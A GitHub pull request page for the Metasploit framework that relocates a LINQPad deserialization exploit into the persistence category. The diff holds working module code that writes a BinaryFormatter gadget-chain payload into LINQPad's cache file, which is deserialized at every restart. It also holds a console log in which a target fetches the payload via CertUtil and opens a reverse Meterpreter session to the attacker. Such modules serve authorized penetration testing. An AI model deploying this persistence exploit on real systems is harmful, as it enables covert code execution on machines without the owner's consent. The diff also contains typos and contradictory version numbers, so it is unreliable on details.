Skip to content

Moves LINQPad module into persistence category #20576

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 6 commits into
base: master
Choose a base branch
from
+71 −13
Open

Moves LINQPad module into persistence category #20576

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
6 commits
Select commit Hold shift + click to select a range
547b318
Moves linqpad deserialization to persistence category
msutovsky-r7 Sep 26, 2025
5bf842c
Moves module to persistence category, docs reformat
msutovsky-r7 Sep 28, 2025
65f764e
Corrects CheckCode from Vulnerable to Appears
msutovsky-r7 Sep 30, 2025
44c3d9b
Fixes documentation, removes unused parameters, code cleanup
msutovsky-r7 Oct 27, 2025
b167a2b
Adds moved_from clause
msutovsky-r7 Oct 29, 2025
ee3058b
Removes moved_from
msutovsky-r7 Oct 29, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
53 changes: 53 additions & 0 deletions documentation/modules/exploit/windows/persistence/linqpad_deserialization.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@
## Vulnerable Application

LINQPad is a scratchpad for .NET programming.
Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting.
Application can be downloaded from [here](https://www.linqpad.net/).


## Verification Steps

1. Install the application
2. Start msfconsole
3. Get session
4. Run: `use windows/local/linqpad_deserialization`
5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters
6. Set parameters `session`, `cache_path`, `linqpad_path`, `cleanup`
7. Run exploit

## Options


### cache\_path

The parameter sets path for folder, where vulnerable cache file is present.
This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file.


## Scenarios

```
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.3.7
msf exploit(multi/handler) > set LPORT 4545
msf exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/linqpad_deserialization_persistence) >
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /LCG8z8xZZXJnz_uKNIZRPw
[*] Started reverse TCP handler on 192.168.3.7:4545
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. LINPad and vulnerable cache file present, target possibly exploitable
[*] Create deserialization payload
[*] Saving the original content
[*] Saved at: /home/ms/.msf4/loot/20251027153340_default_10.5.132.148_CUsersmsfuser_949460.txt
[*] Overwriting file
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/WIN10_1909_BE09_20251027.3341/WIN10_1909_BE09_20251027.3341.rc
[*] Client 10.5.132.148 requested /LCG8z8xZZXJnz_uKNIZRPw
[*] Sending payload to 10.5.132.148 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.148 requested /LCG8z8xZZXJnz_uKNIZRPw
[*] Sending payload to 10.5.132.148 (CertUtil URL Agent)
[*] Sending stage (203846 bytes) to 10.5.132.148
[*] Meterpreter session 2 opened (192.168.3.7:4545 -> 10.5.132.148:50045) at 2025-10-27 15:33:53 +0100
```
31 changes: 18 additions & 13 deletions ...al/linqpad_deserialization_persistence.rb → ...ws/persistence/linqpad_deserialization.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -8,17 +8,19 @@ class MetasploitModule < Msf::Exploit::Local

# includes file?, directory?
include Msf::Post::File
include Msf::Exploit::Local::Persistence

# includes generate
include Msf::Util::DotNetDeserialization
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'LINQPad Deserialization Exploit',
'Name' => 'LINQPad Deserialization',
'Description' => %q{
This module exploits a bug in LINQPad up to version 5.52.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.
This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.
},
'License' => MSF_LICENSE,
'Author' => [
Expand All @@ -43,39 +45,42 @@ def initialize(info = {})
)
)
register_options([
OptString.new('LINQPAD_FILE', [true, 'Path to LINQPad executable on target\'s machine']),
OptString.new('CACHE_PATH', [true, 'Path to cache file directory containing deserialized data']),
OptBool.new('CLEANUP', [false, 'Restore original cache file when exploit finish'])
])
end

# Simplify pulling the writable directory variable

def check
if datastore['LINQPAD_PATH'].blank? || !file?(datastore['LINQPAD_PATH'])
return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist')
elsif datastore['CACHE_PATH'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
if !directory?(datastore['Cache_path']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist')
elsif !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
return Exploit::CheckCode::Unknown('Cannot find cache file')
elsif file?(datastore['CACHE_PATH'] + '/autorefcache46.2.dat')
return Exploit::CheckCode::Safe('Contains not vulnerable version of LINQPad')
else
return Exploit::CheckCode::Appears('LINQPad and vulnerable cache file present, target possibly exploitable')
end

Exploit::CheckCode::Vulnerable('LINPad and vulnerable cache file present, target possibly exploitable')
end

def exploit
def install_persistence
# generate payload
vprint_status('Create deserialization payload')

dotnet_payload = ::Msf::Util::DotNetDeserialization.generate(
payload.encoded, # this is the Operating System command to run
gadget_chain: :TextFormattingRunProperties,
formatter: :BinaryFormatter
)
vprint_status('Saving the original content')
cached_file_content = read_file(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat')
backup_conf_path = store_loot(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat', 'text/plain', session, cached_file_content, 'AutoRefCached46.1.dat', 'autorefcache46.1.dat backup')
vprint_status("Saved at: #{backup_conf_path}")

@clean_up_rc << "upload #{backup_conf_path} #{datastore['CACHE_PATH']}/AutoRefCache46.1.dat"

vprint_status('Overwriting file')
# try to overwrite cache file
fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat', dotnet_payload)

# add cleanup option
register_file_for_cleanup(datastore['CACHE_PATH']) if datastore['CLEANUP']
end
end